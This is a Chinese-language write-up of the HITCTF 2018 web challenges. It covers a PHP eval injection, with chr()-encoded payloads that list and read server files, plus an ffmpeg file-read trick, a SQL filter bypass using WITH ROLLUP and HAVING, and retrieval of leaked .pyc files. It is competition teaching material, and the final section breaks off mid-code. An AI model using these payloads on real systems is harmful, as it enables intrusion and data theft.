HITCTF 2018 wp [我真是菜鸟]

WEB

PHPreading

源码泄露,存在index.php.bak,,解一下base64知道

$flag=$_GET['asdfgjxzkallgj8852'];if($flag=='H1TctF2018EzCTF'){
  die($flag);}die('emmmm');

输入得到flag

这里写图片描述

BabyEval

看一下泄露了一部分源码

<!--
$str=@(string)$_GET['str'];
blackListFilter($black_list, $str);
eval('$str="'.addslashes($str).'";');
-->

首先查到了如果是在双引号内可以通过这样的方式执行eval

?str=${
   ${
   phpinfo()}}

然后先输出全局变量看一下,没发现flag,但是看到了黑名单…

这里写图片描述

然而貌似没什么卵用,继续吧,是不是藏到了index.php中?但是看了以后发现也不是。。。

/?str=${${var_dump(file(chr(46).chr(47).chr(105).chr(110).chr(100).chr(101).chr(120).chr(46).chr(112).chr(104).chr(112)))}}

可以查看index.php,然后就猜测应该还有别的文件了!然后最后在根目录找到了flag的文件

/?str=${${var_dump(glob(chr(47).chr(42)))}}

这里写图片描述

然后最后费劲巴拉终于解决了问题

/?str=${${var_dump(file(chr(47).chr(49).chr(54).chr(50).chr(57).chr(50).chr(48).chr(57).chr(55).chr(54).chr(100).chr(57).chr(99).chr(48).chr(52).chr(97).chr(99).chr(54).chr(57).chr(101).chr(50).chr(102).chr(52).chr(51).chr(57).chr(50).chr(97).chr(56).chr(99).chr(102).chr(102).chr(98).chr(102).chr(95).chr(102).chr(108).chr(97).chr(103).chr(46).chr(116).chr(120).chr(116)))}}

这里写图片描述

题目还是不错的。
补充一下我的方法肯能太笨了…补充好做的方法…
这里写图片描述

小电影

打开题目一看,说是ffmpeg,立马想到去年出的ffmpeg任意文件读取漏洞了,利用file协议的脆弱吧,但是这里不太好的就是不知道文件的路径,猜测flag.txt成功了。
具体怎么做,其实就是用人家的脚本…脚本小子…上传的文件名必须是123.avi,最后得到flag如下

这里写图片描述

BabyInjection

给了源码

<?php
error_reporting(0);

if (!isset($_POST['username']) || !isset($_POST['passwd'])) {
    echo 'Login and get the flag';
    echo '<form action="" method="post">'."<br/>";
    echo '<input name="username" type="text" placeholder="username"/>'."<br/>";
    echo '<input name="passwd" type="text" placeholder="passwd"/>'."<br/>";
    echo '<input type="submit" ></input>'."<br/>";
    echo '</form>'."<br/>";
    die;
}

$flag = '';
$filter = "and|select|from|where|union|join|sleep|benchmark|,|\(|\)|like|rlike|regexp|limit|or";

$username = $_POST['username'];
$passwd = $_POST['passwd'];
if (preg_match("/".$filter."/is",$username)==1){
    die("Hacker hacker hacker~");
}
if (preg_match("/".$filter."/is",$passwd)==1){
    die("Hacker hacker hacker~");
}

$conn = mysqli_connect();

$query = "SELECT * FROM users WHERE username='{$username}';";
echo $query."<br>";
$query = mysqli_query($conn, $query);
if (mysqli_num_rows($query) == 1){
    $result = mysqli_fetch_array($query);
    if ($result['passwd'] == $passwd){
        die('you did it and this is your flag: '.$flag);
    }
    else{
        die('Wrong password');
    }
}
else{
    die('Wrong username');
}

这个貌似是一道实验吧的原题,但是我实在是记不清楚了,最后发现是用with rollup绕过的,但是这里貌似限制了limit的使用,怎么限制呢?这里用了having,半天才想到,真是垃圾!
with rollup的特性在此不讲,和group by组合生成一个列为null的插入查询。然后用having passwd is null限制即可
最后构造如下

这里写图片描述

注意passwd不要输入内容,貌似因为mysql中的null转换到php中是一个空字符串,如果有输入就一定是“”==“某串”,肯定是错的。
好题好题!

BabyLeakage

这个题目我是有点不懂得,说真的都不知道怎么弄出来了,利用了网站的报错机制,首先显示报错泄露了文件的结构

这里写图片描述

然后构造这个 /news/article/1/1/类似的去爆信息
然后看到了很多不得了的信息啊
这里写图片描述

然后需要远程登陆一下他的mysql!
这里写图片描述

mysql> use F1agIsHere;
Database changed
mysql> describe f
    -> ;
+-------+------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+-------+------+------+-----+---------+-------+
| H     | text | YES  |     | NULL    |       |
| I     | text | YES  |     | NULL    |       |
| TC    | text | YES  |     | NULL    |       |
| T     | text | YES  |     | NULL    |       |
| F     | text | YES  |     | NULL    |       |
+-------+------+------+-----+---------+-------+
5 rows in set (0.02 sec)

mysql> describe f;
+-------+------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+-------+------+------+-----+---------+-------+
| H     | text | YES  |     | NULL    |       |
| I     | text | YES  |     | NULL    |       |
| TC    | text | YES  |     | NULL    |       |
| T     | text | YES  |     | NULL    |       |
| F     | text | YES  |     | NULL    |       |
+-------+------+------+-----+---------+-------+
5 rows in set (0.02 sec)

mysql> describe l;
+---------+------+------+-----+---------+-------+
| Field   | Type | Null | Key | Default | Extra |
+---------+------+------+-----+---------+-------+
| {       | text | YES  |     | NULL    |       |
| C10se_  | text | YES  |     | NULL    |       |
| Debu91n | text | YES  |     | NULL    |       |
+---------+------+------+-----+---------+-------+
3 rows in set (0.02 sec)

mysql> describe a;
+----------+------+------+-----+---------+-------+
| Field    | Type | Null | Key | Default | Extra |
+----------+------+------+-----+---------+-------+
| fo_Is_Im | text | YES  |     | NULL    |       |
| mmp      | text | YES  |     | NULL    |       |
| ort      | text | YES  |     | NULL    |       |
+----------+------+------+-----+---------+-------+
3 rows in set (0.02 sec)

mysql> describe g;
+-------+------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+-------+------+------+-----+---------+-------+
| 4n7   | text | YES  |     | NULL    |       |
| }     | text | YES  |     | NULL    |       |
+-------+------+------+-----+---------+-------+
2 rows in set (0.02 sec)

最终答案

HITCTF{C10se_Debu91nfo_Is_Immmport4n7}

SecurePY

这个题目本来没什么思路,结果找到了相似的题目,这是不是TWCTF2017的题目?呃呃呃,提示是/pycache/,然后想到了这个
在 python-web 应用中,当前目录下, .py文件生成的pyc文件会被存储在 pycache文件夹中,并以 .cpython-XX.pyc 为扩展名,其中的 XX 与 CPython 版本有关。比如app.py,其对应的 pyc文件路径为 pycache/app.cpython-35.pyc。我们尝试访问:

http://123.206.83.157:8000/__pycache__/app.cpython-35.pyc

结果还真有东西!然后反编译得到代码

#!/usr/bin/env python
# visit http://tool.lu/pyc/ for more information
from flask import Flask, request, jsonify, render_template
from Crypto.Cipher import AES
from binascii import b2a_hex, a2b_hex
import os
app = Flask(__name__)
flag_key = os.environ['KEY']
flag_enc = '9cf742955633f38d9c628bc9a9f98db042c6e4273a99944bc4cd150a0f7b9f317f52030329729ccf80798690667a0add'

def 
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值